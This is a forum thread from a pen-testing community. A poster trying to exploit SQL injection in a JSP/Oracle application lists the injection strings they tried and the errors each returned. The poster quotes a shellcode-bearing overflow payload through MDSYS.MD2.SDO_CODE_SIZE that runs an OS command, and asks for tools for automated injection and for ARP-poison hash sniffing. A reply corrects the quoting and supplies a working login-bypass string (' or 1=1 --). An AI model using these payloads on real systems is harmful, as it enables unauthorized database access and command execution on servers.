.

Oracle SQL Injection help...

<<

zgrp

Newbie
Newbie

Posts: 6

Joined: Wed Apr 12, 2006 1:32 am

Post Wed Apr 12, 2006 1:53 am

Oracle SQL Injection help...

Hello,

This is my first post at this community, wait I can help other too.

I'm pen-testing a host where have applications running
in JSP and Oracle as a back-end, I found 2 SQL Injections in this application, but I'm not been able to exploit it... if some Oracle SQL Injection master can help me :(

The two scripts is like that:

One is a login form.

Two is a search form, where one of the options (the
city field) is vulnerable, so I belive it's a injection in a WHERE clause.

My objetive is use the Oracle database to execute commands in the Server (I don't care about data in the database).

If I try in the one (login form) the following strings
(Reference http://www.securityfocus.com/infocus/1644):


;select username from all_users where ''x''=''x'

or exists (select 1 from sys.dual) and ''x''=''x'

union select username from all_users where ''x''=''x'

or ''x''=''x'' --'

I get: ORA-01756: quoted string not properly terminated

If I try in the one (login form) the following strings (Reference
http://www.appsecinc.com/presentations/ ... curity.pdf):


UNION select password from DBA_USERS where 'q' = 'q'

I got: ORA-00907: missing right parenthesis

What already appear better, since know appear it have a  "parenthesis" unterminated.

If I try in the one (login form) the following strings (Reference
http://seclists.org/lists/pen-test/2001/Dec/0036.html)

(SELECT username FROM all_users WHERE 1=1)

I got a html access denied message (like when i type a
wring user or pass), appear that subselects doesn't
work.

') UNION SELECT username FROM all_users WHERE (''='

I got: ORA-00904: invalid column name

However all_users is a valid table and username is a vaile colomn. :(

1 - Why this happen? Someone know ? How can I fix it ?

I gained access to the host by other attack, and compromissed the database, and just for curious, I checked it, and it really exist:

USERNAME
SYS
SYSTEM
OUTLN
WMSYS
ORDSYS
ORDPLUGINS
MDSYS
CTXSYS
XDB
ANONYMOUS
WKSYS
WKPROXY
...
...

I also find a intersting reference  (http://security-papers.globint.com.ar/o ... abases.pdf)
where the guy show possibility of execute overflow via SQL Injections, with a string like that for example:

A'||TO_CHAR(MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR(227)||CHR(251)||CHR(90)||CHR(227)||CHR(120)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)||chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)||chr(255)||chr(208)||'dir>c:\dir.txt'))--

2 - If I try it, I got a ORA-00907: missing right parenthesis, someone know how could I use it in my example ?

3 - Even if it worked, he redirect the output to c:\dir.txt, can't it be sent to stdout (web page return from query) ?

4 - Someone know a tool, that for example, I find a SQL Injection, and pass it to the tool, and it make several trys, to detect the right way to make the querys ? :)

ps: Out of topic, someone already had success (or know how to) compile programs that use raw sockets/libpcap/libnet with cygwin (Like compile
dsniff, ettercap,...) ?

ps2: Or do you know a good password in command line for windows (that can be totally installed via command line) and make arp poison and filter passwords hash like ntlm, oracle, sql server, etc?

Thank you a lot.

Cya
<<

pcsneaker

Jr. Member
Jr. Member

Posts: 73

Joined: Mon Nov 07, 2005 12:23 pm

Post Wed Apr 12, 2006 5:58 am

Re: Oracle SQL Injection help...

That's a lot of different things you're trying to do.

Start with the most basic:

You said that you want to exploit a login form. The query contructed by a login form usually is something like:

select * from users where username =' Content of Textbox1'
and password = 'Content of Textbox2'


You mentioned that you tried to enter
 
or ''x''=''x'' --'


and get the error ORA-01756: quoted string not properly terminated. With your input the query will be:

select * from users where username =' or ''x''=''x'' --''
                                                  2 single quotes ^^
and password = 'Content of Textbox2'

If you modify your input slightly

    ' or 1=1 --

that will give you
select * from users where username ='' or 1=1 --'
                              2 single quotes ^^
and password = 'Content of Textbox2'

Now everything after the second '1' should be ignored and your query should work.

Hint: Try to figure out the query constructed by the form you want to exploit, write it down and look at it after modifying by your input...
MCSA:Security (W2k, W2k3)
MCSE:Security (W2k, W2k3)
CPTS, Network+

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 1 guest

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software